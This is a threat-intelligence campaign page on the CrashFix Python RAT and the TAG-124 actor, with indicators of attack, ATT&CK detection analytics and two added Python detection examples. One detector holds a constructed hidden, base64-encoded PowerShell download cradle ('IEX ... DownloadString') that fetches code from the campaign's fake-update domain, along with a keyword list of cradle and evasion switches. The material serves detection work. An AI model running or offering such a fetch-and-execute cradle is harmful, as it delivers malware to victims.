
CrashFix Python RAT Campaign
Indicators of Compromise
No domains found for this campaign
APT Groups
TAG-124 specializes in stealthy malware distribution without direct post-compromise activity. It compromises thousands of legitimate websites (primarily WordPress) to inject obfuscated JavaScript that redirects qualifying visitors to fake software update pages (e.g., bogus Google Chrome updates). Techniques include frequent rotation of URLs and JavaScript filenames, conditional logic for evasion (bypassing sandboxes and researchers), and social engineering tricks such as ClickFix (prompting users to paste and run malicious commands). Payloads often masquerade as legitimate updates and lead to loaders or direct malware execution. The infrastructure consists of compromised sites, actor-controlled servers, central management panels, and payload hosts.

Indicators of Attack (IoA)
- Injection of malicious/obfuscated JavaScript into compromised WordPress sites (e.g., files like metrics.js, hpms1989.js).
- Redirects to fake update domains (e.g., update-chronne[.]com/Release.zip).
- Use of ClickFix social engineering (fake dialogs prompting clipboard execution).
- Payloads including MintsLoader, REMCOS RAT, or ransomware precursors.
- Traffic filtering based on referer (often misspelled in code), user-agent, or IP.
- High-volume compromises of legitimate sites via SEO poisoning or direct breaches.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1053.005 - Scheduled Task
| ID | Name | Analytic ID | Analytic Description |
| | Detection of Suspicious Scheduled Task Creation and Execution on Windows | | Detects the creation, modification, or deletion of scheduled tasks through Task Scheduler, WMI, PowerShell, or API-based methods followed by execution from svchost.exe or taskeng.exe. Includes detection of hidden or anomalous scheduled tasks, especially those created under SYSTEM or suspicious user contexts. |
T1033 - System Owner/User Discovery
| ID | Name | Analytic ID | Analytic Description |
| | Behavioral Detection of User Discovery via Local and Remote Enumeration | | Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell). |
| | | | Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details. |
| | | | Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents. |
| | | | Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches. |
T1082 - System Information Discovery
| ID | Name | Analytic ID | Analytic Description |
| | | | Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. |
| | | | Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. |
| | | | Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. |
| | | | Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. |
| | | | Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. |
| | | | Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1140 - Deobfuscate/Decode Files or Information
| ID | Name | Analytic ID | Analytic Description |
| | Detect Adversary Deobfuscation or Decoding of Files and Payloads | | An adversary leverages built-in tools such as certutil.exe, powershell.exe, or copy.exe to decode, reassemble, or extract hidden malicious content from obfuscated containers or encoded formats. The decoding utility often spawns shortly after file staging or download and may be chained with script interpreters or further payload execution. |
| | | | The adversary uses native utilities like base64, gzip, tar, or openssl to decode, decompress, or decrypt files that were previously staged or downloaded. These tools may be chained with curl/wget and executed via bash/zsh, often to extract an embedded payload or reverse shell script. |
| | | | The adversary invokes built-in scripting or decoding tools like base64, plutil, or AppleScript-based utilities to decode files embedded in staging artifacts. Decoding often occurs post-download or as part of post-exploitation payload deployment via zsh, python, or osascript. |
T1016 - System Network Configuration Discovery
| ID | Name | Analytic ID | Analytic Description |
| | Behavioral Detection of System Network Configuration Discovery | | Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration. |
| | | | Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration. |
| | | | Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status. |
| | | | Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information. |
| | | | CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console. |
T1036.004 - Masquerade Task or Service
| ID | Name | Analytic ID | Analytic Description |
| | Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution | | Creation or modification of Windows services or scheduled tasks with names or descriptions mimicking legitimate entries, followed by anomalous execution of untrusted binaries or LOLBAS. |
| | | | Creation or modification of systemd service units or cron jobs using deceptive naming and untrusted command paths, often followed by lateral network activity or privilege escalation. |
| | | | Creation of LaunchAgents or LaunchDaemons with names resembling known system services but executing non-Apple signed code or scripts. |
T1049 - System Network Connections Discovery
| ID | Name | Analytic ID | Analytic Description |
| | Detection of System Network Connections Discovery Across Platforms | | Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections. |
| | | | Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging. |
| | | | Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery. |
| | | | Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections. |
| | | | Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches. |
| | | | Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI). |
T1204 - User Execution
| ID | Name | Analytic ID | Analytic Description |
| | | | Cause→effect chain: (1) User-facing app (Office/PDF/archiver/browser) records an open/click or abnormal event, then (2) a downloaded file is created in a user-writable path and/or decompressed, (3) the parent user app spawns a living-off-the-land binary (e.g., powershell/cmd/mshta/rundll32/msiexec/wscript/expand/zip) or installer, and (4) immediate outbound HTTP(S)/DNS/SMB from the same lineage. |
| | | | Cause→effect chain: (1) User app/browser/archiver logs an open/click or abnormal exit, (2) new executable/script/archive extracted into $HOME/Downloads, /tmp, or ~/.cache, (3) parent app spawns shell/interpreter (bash/sh/python/node/curl/wget) or desktop file, and (4) new outbound connection(s) from the child lineage. |
| | | | Cause→effect chain: (1) unified logs show application open/click or crash for Safari/Chrome/Office/Preview/archiver, (2) file write/extraction into ~/Downloads, /private/var/folders/* or ~/Library, (3) parent app spawns osascript/bash/zsh/curl/python or opens a quarantined app with Gatekeeper prompts, (4) network egress from child. |
| | | | Cause→effect chain in CI/dev desktops: (1) user triggers container run/pull after opening a doc/link/script, (2) newly created image/container uses unexpected external registry or entrypoint, (3) container starts and immediately egresses to suspicious destinations. |
| | | | Cause→effect chain in cloud consoles: (1) user clicks link then invokes instance/image creation via API, (2) instance/image originates from external AMI or unknown image, (3) instance immediately egresses or retrieves payloads. |
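The Windows cause→effect chain above (user-facing app spawns a living-off-the-land binary, which then egresses) can be checked with a small lineage correlation over process and network telemetry. This is an added example, not the campaign page's or any vendor's detection content; the event field names, the app/LOLBin lists, and all sample events are constructed for the illustration, and the destination in the flagged chain reuses the fake-update domain named in the IoA list.

```python
from dataclasses import dataclass

USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe",
             "excel.exe", "acrord32.exe", "7zfm.exe", "winrar.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "msiexec.exe", "wscript.exe", "cscript.exe", "expand.exe"}

@dataclass
class Event:
    ts: int           # seconds on a constructed clock
    kind: str         # "proc" = process creation, "net" = outbound connection
    pid: int
    ppid: int = 0     # parent pid, for "proc" events
    image: str = ""   # executable basename, for "proc" events
    dest: str = ""    # remote host, for "net" events

def find_user_execution_chains(events, window=120):
    """Return (user_app, lolbin, dest) for each outbound connection whose lineage
    holds a LOLBin spawned under a user app at most `window` seconds earlier."""
    by_pid = {}
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "proc":
            by_pid[ev.pid] = ev
            continue
        cur, lolbin = by_pid.get(ev.pid), None
        while cur is not None:                 # walk the ancestry of the connecting process
            if lolbin is None and cur.image.lower() in LOLBINS:
                lolbin = cur
            parent = by_pid.get(cur.ppid)
            if (lolbin is not None and parent is not None
                    and parent.image.lower() in USER_APPS
                    and ev.ts - lolbin.ts <= window):
                hits.append((parent.image, lolbin.image, ev.dest))
                break
            cur = parent
    return hits

# Constructed sample telemetry: one ClickFix-style chain plus two benign lineages.
SAMPLE_EVENTS = [
    Event(100, "proc", 400, 1, "chrome.exe"),
    Event(130, "proc", 512, 400, "powershell.exe"),
    Event(134, "net", 512, dest="update-chronne[.]com"),
    Event(200, "proc", 600, 400, "updater.exe"),        # browser's own updater, no LOLBin
    Event(201, "net", 600, dest="updates.example.net"),
    Event(300, "proc", 700, 4, "svchost.exe"),          # LOLBin under a service, not a user app
    Event(301, "proc", 710, 700, "rundll32.exe"),
    Event(302, "net", 710, dest="10.0.0.5"),
]
```

Only the browser → PowerShell → egress lineage is reported; the updater and the service-hosted rundll32 fall outside the chain because no user app sits directly above a LOLBin.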
T1057 - Process Discovery
| ID | Name | Analytic ID | Analytic Description |
| | | | Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin. |
| | | | Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role. |
| | | | Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse. |
| | | | Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles. |
| | | | Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes. |
T1059.001 - PowerShell
| ID | Name | Analytic ID | Analytic Description |
| | | | Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations. |
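Encoded-command launches are the part of this analytic that needs decoding before any keyword logic can apply, since the script body is base64 of UTF-16LE text. The added example below (not from the campaign page or any product) recovers the script behind any accepted prefix of -EncodedCommand and then scores the raw and decoded text against a constructed indicator list; the sample command line is constructed, with the fake-update domain taken from the IoA list above.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in telemetry. The argument is base64 of UTF-16LE script text.
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)"
    r"\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Constructed indicator list for this illustration (download cradles, evasion switches).
INDICATORS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr",
              "iex", "invoke-expression", "frombase64string", "net.webclient",
              "-nop", "hidden", "bypass")

def decode_encoded_command(cmdline):
    """Return the script text behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def powershell_indicators(cmdline):
    """Indicators present as whole tokens in the raw command line or its decoded payload."""
    decoded = decode_encoded_command(cmdline) or ""
    haystack = f"{cmdline} {decoded}".lower()
    return [ind for ind in INDICATORS
            if re.search(r"(?<![a-z0-9])" + re.escape(ind) + r"(?![a-z0-9])", haystack)]

def encode_for_sample(script):
    """Only used to build the constructed sample; mirrors the encoding PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: a download cradle hidden behind -enc, pointing at the page's fake-update host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://update-chronne[.]com/Release.zip')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_for_sample(SAMPLE_SCRIPT)
```

A plain `powershell.exe -Command Get-Date` yields no decoded body and no indicators, while the encoded sample decodes back to the cradle and scores on both the raw switches and the decoded content.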
T1547.001 - Registry Run Keys / Startup Folder
| ID | Name | Analytic ID | Analytic Description |
| | | | Correlation of Registry key creation/modification events under known Run/Startup keys with new or unusual binary paths or script-based payloads. Multi-event detection includes registry modification followed by process execution from non-standard directories or abnormal parent-child process relationships. |
T1027 - Obfuscated Files or Information
| ID | Name | Analytic ID | Analytic Description |
| | | | Correlates script execution or suspicious parent processes with creation or modification of encoded, compressed, or encrypted file formats (e.g., .zip, .7z, .enc) and abnormal command-line syntax or PowerShell obfuscation. |
| | | | Detects use of gzip, base64, tar, or openssl in scripts or commands that encode/encrypt files after file staging or system enumeration. |
| | | | Monitors use of archive or encryption tools (zip, openssl) tied to user-scripted activity or binaries writing encoded payloads under /Users or /Volumes. |
| | | | Identifies transfer of base64, uuencoded, or high-entropy files over HTTP, FTP, or custom protocols in lateral movement or exfiltration streams. |
| | | | Detects encoded PowerCLI or Base64-encoded payloads staged via datastore uploads or shell access (e.g., ESXi Shell or backdoored VIBs). |
T1518.001 - Security Software Discovery
| ID | Name | Analytic ID | Analytic Description |
| | | | Adversary executes commands to enumerate installed antivirus, EDR, or firewall agents using WMI, registry queries, and built-in tools (e.g., tasklist, netsh, sc query). Correlated with elevated process privileges or scripting engine usage. |
| | | | Adversary runs discovery commands such as ps aux, systemctl status, or cat /etc/init.d/ to enumerate security software or services. Often occurs alongside privilege escalation or bash script execution. |
| | | | Adversary attempts to detect monitoring agents such as Little Snitch, KnockKnock, or other system daemons via process listing (ps -e), application folder checks, and system extension listing. |
T1059.006 - Python
| ID | Name | Analytic ID | Analytic Description |
| | | | Detects Python execution via python.exe or py.exe with anomalous parent lineage (e.g., Office macros, LOLBAS), execution from unusual directories, or chained network/PowerShell/system-level activity. |
| | | | Detects native Python or framework-based execution from Terminal, embedded apps, or launchd jobs. Flags network calls, persistence writes, or system enumeration after Python launch. |
| | | | Detects Python execution from non-standard user contexts or cron jobs that invoke outbound traffic, access sensitive files, or perform process injection (e.g., ptrace or /proc memory maps). |
| | | | Detects Python script or interpreter execution on ESXi hosts via embedded BusyBox shells, nested installations, or dropped files via SSH or datastore mount. Flags unusual scripting or post-compromise enumeration behavior. |
T1071.001 - Web Protocols
| ID | Name | Analytic ID | Analytic Description |
| | Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets | | Detects unexpected or high-volume HTTP/S/WebSocket communication from suspicious processes (e.g., PowerShell, rundll32) using uncommon user agents or mimicking browser traffic to unusual domains or IPs. |
| | | | Detects curl, wget, Python requests, or custom HTTP clients communicating over non-standard ports, with repetitive or beacon-like patterns or POST-heavy behavior to rare domains. |
| | | | Detects applications such as Automator, AppleScript, or LaunchDaemons invoking HTTP/S traffic to non-standard domains or using suspicious headers (e.g., Base64 in URIs or cookie fields). |
| | | | Detects HTTP or HTTPS communication initiated by shell-based scripts or management daemons, especially those reaching public IPs over ports 80/443 using embedded curl or wget. |
| | | | Detects Web protocol misuse such as encoded HTTP headers, WebSocket upgrade requests with abnormal payloads, or TLS handshake anomalies suggesting embedded C2 channels. |
T1105 - Ingress Tool Transfer
| ID | Name | Analytic ID | Analytic Description |
| | | | Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). |
| | | | Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. |
| | | | Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. |
| | | | Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. |
| | | | Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |